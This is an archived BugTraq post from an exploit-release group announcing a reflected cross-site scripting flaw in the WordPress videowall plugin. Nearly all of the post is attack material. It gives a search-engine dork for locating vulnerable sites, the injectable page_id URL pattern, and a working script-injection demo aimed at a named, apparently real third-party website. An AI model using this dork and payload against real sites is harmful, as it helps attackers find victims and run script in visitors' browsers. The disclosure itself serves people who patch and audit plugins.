BugTraq
Wordpress videowall Plugin Xss vulnerabilities Oct 19 2013 07:27AM
iedb team gmail com
The Wordpress videowall Plugin suffers from a Cross-Site Scripting Vulnerability

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

# Exploit Title : Wordpress videowall Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team (at) Gmail (dot) com [email concealed]

# Home : http://iedb.ir - http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/wp-content/plugins/videowall/

#################################

# Exploit :

# http://site.com/wp-content/plugins/videowall/index.php?page_id=[Xss]

# Dem0 :

# http://neroqom.com/wp-content/plugins/videowall/index.php?page_id=8"><sc
ript>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-716.html

#################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus